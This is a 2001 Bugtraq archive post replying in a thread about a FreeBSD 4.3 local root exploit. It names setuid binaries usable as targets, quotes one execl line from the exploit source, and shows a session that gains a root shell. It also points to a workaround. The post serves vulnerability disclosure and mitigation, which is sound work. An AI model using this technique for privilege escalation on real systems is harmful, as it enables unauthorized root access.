Bugtraq mailing list archives

Re: FreeBSD 4.3 local root

From: "Przemyslaw Frasunek" <venglin () freebsd lublin pl>
Date: Wed, 11 Jul 2001 14:31:06 +0200

Well, after a bunch of tests I've found only two suids which gave me
suid shell:
/usr/bin/passwd
/usr/local/bin/ssh1


/usr/bin/su also works for me:

riget:venglin:~> egrep -e execl vvfreebsd.c
  if(!execl("/usr/bin/su","su","szymon",0))

riget:venglin:~> ./v
vvfreebsd. Written by Georgi Guninski
shall jump to bfbffe72
child=57660
Password:done
# id
uid=0(root) gid=1001(users) groups=1001(users), 99(rexec)

So, quick workaround should be


Quick workaround is to limit arguments, environment and filter non-ascii
characters:

http://www.frasunek.com/sources/security/rexec/

--
* Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NIC-HDL: PMF9-RIPE *
* Inet: przemyslaw () frasunek com ** PGP: D48684904685DF43EA93AFA13BE170BF *

Current thread:

Re: FreeBSD 4.3 local root Przemyslaw Frasunek (Jul 11)
- Re: FreeBSD 4.3 local root Matias Sedalo (Jul 15)
- Re: FreeBSD 4.3 local root Foldi Tamas (Jul 15)
  - Re: FreeBSD 4.3 local root Przemyslaw Frasunek (Jul 15)